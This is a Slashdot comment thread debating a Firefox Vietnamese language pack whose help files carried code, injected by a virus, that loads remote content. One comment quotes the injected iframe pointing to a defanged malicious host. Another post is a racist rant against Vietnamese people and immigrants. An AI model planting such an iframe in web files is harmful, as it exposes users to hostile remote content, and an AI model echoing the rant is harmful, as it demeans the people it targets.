This has nothing to do with Mozilla accepting user-submitted extensions. If anything, that makes them more careful about what they publish. A developer's machine becoming infected with an as yet unknown virus that is undetected by anti-virus scanners is a risk that every software producer faces. How many commercial software vendors even run their developers' code through a virus check when it is committed, let alone running regular anti-virus checks on software they have already released?

Re:Proprietary software has the same risk (1)

NoSCO (858498) | more than 5 years ago | (#23336734)

I'd be inclined to say proprietary software has a higher risk of unintentional infection than OSS, because of the reasons already stated in this thread, and that there is a higher percentage of Windows-based coding platforms. Developer PC gets infected with some new strain, and potentially it goes all the way up the chain before being noticed.

It's when you get unto the deliberate infection realms that things start to get murky. I'd argue it easier to deliberately infect via an OSS plugin than it would be to say, poison the next release of McAfee AV. However consider the scenario - if this were via McAfee AV rather than an OSS language pack, would we have ever discovered it?

Racists trolls go away (1, Informative)

davidwr (791652) | more than 5 years ago | (#23336478)

Will someone with mod points drive the racist posts down to -2 where they belong?

Ignore this (3, Informative)

Anonymous Coward | more than 5 years ago | (#23336578)

post. removing incorrect mod.

Who cares (-1, Flamebait)

p51d007 (656414) | more than 5 years ago | (#23336630)

Bunch of communist in Viet-Nam anyway. The ones in this country (USA) need to learn English anyway, as anyone who lives in the USA. Learn English, speak English, or get the hell out!

Re:Who cares (0)

Anonymous Coward | more than 5 years ago | (#23336766)

Me no understand. What you say?

OSS BLOWS (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#23336672)

OSS is flawed by nature, the lack of responsibility and financial incentive in addition to a vendors reputation and survival is why OSS will ultimnately die on the vine as scum sucking dickwads with nothing better to do will lure the masses into downloading their malware infected pack.

      This is because OSS, being a communal effort and not being the flagship product of a profit driven private sector organization will always be vulnerable to this and its just getting started.

    But this is not surprise to me, it was a matter of time and the idea of OSS was utopian to a fault.

More Slashdot Sensationalism (5, Informative)

MobyDisk (75490) | more than 5 years ago | (#23336768)

The article says:

...That Trojan inserted a banner-ad displaying script into any html file on his system, which included the help files for the language pack.

That meant that anyone installing the language pack would have malicious ad displaying code inside their browser -- which could be used for other exploits.
So the language pack did not have a Trojan. I don't think the language packs even have executable code. The language packs had help files with banner ads in them. That's not even close to what the headline says. But I guess "Vietnamese help files may contain ads" doesn't sound as scary.

(I guess this means Slashdot sensationalism isn't restricted to anti-Microsoft articles.)

Re:More Slashdot Sensationalism (1, Informative)

Anonymous Coward | more than 5 years ago | (#23337280)

To be entirely fair, the headline does not necessarily imply the infection you presume it does. To use 100% correct terminology, the Vietnamese language pack was affected by a virus that had infected the developers' computer.

There is a fine line between affection and infection, but they are regularly used interchangeably.

Not really infected (4, Informative)

hweimer (709734) | more than 5 years ago | (#23336796)

According to the Mozilla Security Blog [mozilla.com] the language pack did not contain any malicious code, but only manipulated HTML files:

The Vietnamese language pack for Firefox 2 contains inserted code to load remote content. This code is the result of a virus infection, but does not contain the virus itself.

Re:Not really infected (0)

Anonymous Coward | more than 5 years ago | (#23336924)

Mod this one up!!!

Here is the actual virus code distributed (0)

Anonymous Coward | more than 5 years ago | (#23336928)

knock yourself out

<iframe src="httx://super.badsite.cn/evil.php"></iframe>

and thats it !, only displayed if someone wants to RTFM in Vietnamese (yeah right)
no executable code at all (certainly not viral unless html is a virus) and the site has no extra security privileges over any other

seems the Slashdot title is a bit over reactionary considering

Avoid infections (0, Funny)

Anonymous Coward | more than 5 years ago | (#23336990)

I use trojans to avoid infection...

So it was discovered because ... (1)

Zero__Kelvin (151819) | more than 5 years ago | (#23337014)

Unless this trojan was discovered by analysis of the binary, then this is prima facia evidence that F/OSS tends toward greater security than proprietary software. When the typical person (as this thread shows) exclaims: OMFG, look! A trojan in F/OSS was discovered, but none have been discovered in competing proprietary products! they are wrongly assuming, as has been done over and over in this thread, that the code I cannot see is more secure than what I can see! I mean if I have no way to see the trojan, it isn't there, right?

Instead of saying that more trojans have been found, bear in mind that what is really going on is that more trojans have been discovered and removed. Just because no trojans were discovered and removed from M$ Windows today, that does not mean that there are none that remain undiscovered, and that will never be removed.

Of course, I'm ignoring for the purposes of this post the fact that one very valid definition of M$ Windows is "The most widely distributed trojan in the history of computing". :-)

Easy fix! (1)

atlastiamborn (1252206) | more than 5 years ago | (#23337216)

Surely, all they would have to do to fix this situation is push out another update with a spartan in it. That should take care of that pesky trojan, wouldn't it?

Trojans and viruses on commercial CDs (2, Insightful)

argent (18001) | more than 5 years ago | (#23337300)

There have been a number of incidents of trojans and viruses being distributed in commercial shrinkwrapped software. Firefox was slack, like commercial distributors have now and then been slack. You get caught by surprise, fix the process, and keep going, and keep it from happening again.

If they don't address the process that caused the problem, then start worrying.

This doesn't surprise me... (1)

boneclinkz (1284458) | more than 5 years ago | (#23337320)

This is why I stick with tried and true Internet Explorer, rather than using a second-rate third-party browser just to be contrary.

virus's signature was unknown .. (0, Redundant)

rs232 (849320) | more than 5 years ago | (#23337420)

I didn't know software developeers relied on 'virus signatures', I thought they used MD5 hashes [inode.at]. And of course you don't download from any old site. Have sound security practices changed in the meanwhile?
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...